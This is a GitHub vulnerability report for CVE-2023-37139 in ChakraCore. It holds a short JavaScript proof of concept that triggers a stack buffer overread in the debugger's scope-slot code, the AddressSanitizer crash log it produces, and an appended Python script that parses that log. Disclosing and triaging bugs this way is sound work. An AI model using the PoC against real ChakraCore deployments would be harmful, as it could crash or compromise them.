CVE-2023-37139: dynamic-stack-buffer-overflow in release build · Issue #6884 · chakra-core/ChakraCore
ChakraCore branch master cbb9b was discovered to contain a stack overflow vulnerability via the function Js::ScopeSlots::IsDebuggerScopeSlotArray().
Branch: master
Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17
PoC:
function Run() {
    var intl = new Intl.Collator();
    intl.compare('a','b');/**bp:resume('step_into');locals()**/
    let C1 = class NotC1 {
        attemptOuterBindingChange() { C1 = 1; }
        attemptInnerBindingChange() { NotC1 = 1; }
        outerbindingUnmodified() { return C1 !== 1; }
        innerbindingUnmodified() { return NotC1 !== 1; }
    }.Echo('PASS');
}
WScript.Attach(Run);
In release build, ./build.sh --sanitize=address --static -j
I get the following log:
==10284==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7ffcceecb558 at pc 0x55bf9a7362b3 bp 0x7ffcceec3300 sp 0x7ffcceec32f8
READ of size 8 at 0x7ffcceecb558 thread T0
#0 0x55bf9a7362b2 in Js::ScopeSlots::IsDebuggerScopeSlotArray() (/root/ChakraCore-latest/out/Release/ch+0x6d42b2)
#1 0x55bf9a918523 in Js::SlotArrayVariablesWalker::PopulateMembers() (/root/ChakraCore-latest/out/Release/ch+0x8b6523)
#2 0x55bf9a916f14 in Js::VariableWalkerBase::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8b4f14)
#3 0x55bf9a91ed1a in Js::DiagScopeVariablesWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8bcd1a)
#4 0x55bf9a924b4c in Js::LocalsWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8c2b4c)
#5 0x55bf9a55b7ca in JsrtDebuggerStackFrame::GetLocalsObject(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4f97ca)
#6 0x55bf9a5ed7f5 in JsDiagGetStackProperties (/root/ChakraCore-latest/out/Release/ch+0x58b7f5)
#7 0x55bf9a41c96b in Debugger::GetStackProperties(void*, bool, void**, unsigned short, void*) (/root/ChakraCore-latest/out/Release/ch+0x3ba96b)
#8 0x55bf9b012f61 in Js::JavascriptExternalFunction::StdCallExternalFunctionThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb0f61)
#9 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#10 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#11 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#12 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
#13 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
#14 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#15 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#16 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#17 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
#18 0x55bf9adbdde1 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5bde1)
#19 0x55bf9ab602d9 in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xafe2d9)
#20 0x55bf9aab41dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
#21 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#22 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#23 0x7f43138e1f41 (<unknown module>)
#24 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#25 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#26 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#27 0x55bf9adbb9c5 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd599c5)
#28 0x55bf9aaef893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
#29 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#30 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#31 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#32 0x7f43138e1eb9 (<unknown module>)
#33 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#34 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#35 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#36 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
#37 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
#38 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#39 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#40 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#41 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
#42 0x55bf9aaeed79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
#43 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#44 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#45 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#46 0x7f43138e1ef1 (<unknown module>)
#47 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#48 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#49 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#50 0x55bf9adbbb55 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59b55)
#51 0x55bf9aaef893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
#52 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#53 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#54 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#55 0x7f43138e1f01 (<unknown module>)
#56 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#57 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#58 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#59 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
#60 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
#61 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#62 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#63 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#64 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
#65 0x55bf9aaeed79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
#66 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
#67 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
#68 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#69 0x7f43138e1f09 (<unknown module>)
#70 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#71 0x55bf9a78331a in Js::ScriptContext::ProfileModeThunk_DebugModeWrapper(Js::JavascriptFunction*, Js::ScriptContext*, void* (*)(Js::RecyclableObject*, Js::CallInfo, ...), Js::Arguments&) (/root/ChakraCore-latest/out/Release/ch+0x72131a)
#72 0x55bf9a78136d in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f36d)
#73 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#74 0x55bf9b018a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
#75 0x55bf9b01872f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
#76 0x55bf9a51175a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
#77 0x55bf9a41ec15 in Debugger::CallFunction(char const*, void**, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3bcc15)
#78 0x55bf9a41b319 in Debugger::HandleDebugEvent(_JsDiagDebugEvent, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b9319)
#79 0x55bf9a550d20 in JsrtDebugManager::CallDebugEventCallback(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0x4eed20)
#80 0x55bf9a551f0a in JsrtDebugManager::CallDebugEventCallbackForBreak(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4eff0a)
#81 0x55bf9a54f7c3 in JsrtDebugManager::ReportBreak(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed7c3)
#82 0x55bf9a54f2a5 in JsrtDebugManager::DispatchHalt(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed2a5)
#83 0x55bf9a95adc9 in Js::ProbeContainer::DispatchStepHandler(Js::InterpreterHaltState*, Js::OpCode*) (/root/ChakraCore-latest/out/Release/ch+0x8f8dc9)
#84 0x55bf9aacd2a0 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6b2a0)
#85 0x55bf9aab3b77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
#86 0x55bf9aab2981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
#87 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#88 0x7f43138e0f99 (<unknown module>)
#89 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#90 0x55bf9a78165a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
#91 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#92 0x55bf9b018a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
#93 0x55bf9b01872f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
#94 0x55bf9a51175a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
#95 0x55bf9a439b1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
#96 0x55bf9a43ce0b in CustomMessage<WScriptJsrt::AttachCallback(void*, bool, void**, unsigned short, void*)::$_1, WScriptJsrt::CallbackMessage>::Call(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3dae0b)
#97 0x55bf9a416804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
#98 0x55bf9a419913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
#99 0x55bf9a41a606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
#100 0x7f4317ecfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#101 0x55bf9a318d59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)
Address 0x7ffcceecb558 is located in stack of thread T0 at offset 2968 in frame
#0 0x55bf9aacc8bf in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6a8bf)
This frame has 22 object(s):
[32, 40) 'thisVar.i'
[64, 70) 'ldElemInfo.i'
[96, 112) 'agg.tmp36.i.i'
[128, 144) 'agg.tmp2.i.i.i.i3477'
[160, 176) 'agg.tmp2.i.i.i.i3459'
[192, 208) 'agg.tmp2.i.i.i.i3436'
[224, 240) 'agg.tmp2.i.i.i.i'
[256, 272) 'agg.tmp2.i.i.i'
[288, 352) 'info.i.i3194'
[384, 448) 'info.i.i3153'
[480, 544) 'info.i.i3117'
[576, 640) 'info.i.i3087'
[672, 736) 'info.i.i'
[768, 776) 'ip.addr.i'
[800, 808) 'ip'
[832, 834) 'op'
[848, 912) 'haltState'
[944, 1008) 'haltState83'
[1040, 1048) 'yieldValue'
[1072, 1080) 'yieldValue1592'
[1104, 1168) 'haltState1625'
[1200, 1264) 'haltState1672' <== Memory access at offset 2968 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow (/root/ChakraCore-latest/out/Release/ch+0x6d42b2) in Js::ScopeSlots::IsDebuggerScopeSlotArray()
Shadow bytes around the buggy address:
0x100019dd1650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1660: ca ca ca ca 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd1690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100019dd16a0: 00 00 00 00 00 cb cb cb cb cb cb[cb]f1 f1 f1 f1
0x100019dd16b0: f8 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
0x100019dd16c0: f8 f2 f2 f2 f8 f3 f3 f3 00 00 00 00 00 00 00 00
0x100019dd16d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100019dd16e0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100019dd16f0: 00 00 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==10284==ABORTING
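Added triage example (not part of the original issue or of ChakraCore): it pulls the error class, access and top frame out of the log above and maps the faulting address to its shadow byte to confirm which redzone was hit. It assumes ASan's default x86-64 Linux mapping, shadow = (addr >> 3) + 0x7fff8000; the function names and the trimmed REPORT excerpt are this example's own.

```python
import re

# Assumption: ASan's default shadow mapping on x86-64 Linux.
SHADOW_SCALE, SHADOW_OFFSET = 3, 0x7FFF8000
# Subset of the shadow byte legend printed in the report.
LEGEND = {0x00: "addressable", 0xF1: "stack left redzone",
          0xF2: "stack mid redzone", 0xF3: "stack right redzone",
          0xF8: "stack use after scope", 0xCA: "left alloca redzone",
          0xCB: "right alloca redzone"}

# Lines copied from the report above; stack and shadow dump trimmed.
REPORT = """\
==10284==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7ffcceecb558 at pc 0x55bf9a7362b3 bp 0x7ffcceec3300 sp 0x7ffcceec32f8
READ of size 8 at 0x7ffcceecb558 thread T0
#0 0x55bf9a7362b2 in Js::ScopeSlots::IsDebuggerScopeSlotArray() (/root/ChakraCore-latest/out/Release/ch+0x6d42b2)
#1 0x55bf9a918523 in Js::SlotArrayVariablesWalker::PopulateMembers() (/root/ChakraCore-latest/out/Release/ch+0x8b6523)
0x100019dd1690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100019dd16a0: 00 00 00 00 00 cb cb cb cb cb cb[cb]f1 f1 f1 f1
0x100019dd16b0: f8 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
"""

def shadow_address(addr):
    """Map an application address to the shadow byte that describes it."""
    return (addr >> SHADOW_SCALE) + SHADOW_OFFSET

def shadow_rows(text):
    """Return {row_base: [16 shadow bytes]} parsed from the dump lines."""
    rows = {}
    for m in re.finditer(r"^(?:=>)?[ \t]*(0x[0-9a-f]+):(.*)$", text, re.M):
        rows[int(m.group(1), 16)] = [int(b, 16) for b in re.findall(r"[0-9a-f]{2}", m.group(2))]
    return rows

def triage(text):
    """Summarise an ASan report and decode the shadow byte at the fault."""
    head = re.search(r"AddressSanitizer: (\S+) on address (0x[0-9a-f]+)", text)
    acc = re.search(r"^(READ|WRITE) of size (\d+)", text, re.M)
    top = re.search(r"^#0 \S+ in (.+?) \(", text, re.M)
    sh = shadow_address(int(head.group(2), 16))
    row = shadow_rows(text)[sh & ~0xF]
    # ASan brackets the faulting shadow byte; its position must equal sh & 0xF.
    marked = re.search(r"^=>\S+:(.*?)\[", text, re.M).group(1)
    bracket_index = len(re.findall(r"[0-9a-f]{2}", marked))
    return {
        "kind": head.group(1), "access": acc.group(1), "size": int(acc.group(2)),
        "top_frame": top.group(1), "shadow_addr": sh,
        "mapping_consistent": bracket_index == (sh & 0xF),
        "state": LEGEND.get(row[sh & 0xF], "unknown"),
    }

if __name__ == "__main__":
    for key, value in triage(REPORT).items():
        print(f"{key}: {hex(value) if key == 'shadow_addr' else value}")
```

The bracketed shadow byte decodes to a right alloca redzone: the 8-byte read landed just past a dynamically sized stack allocation, which is why ASan classes the fault as dynamic-stack-buffer-overflow.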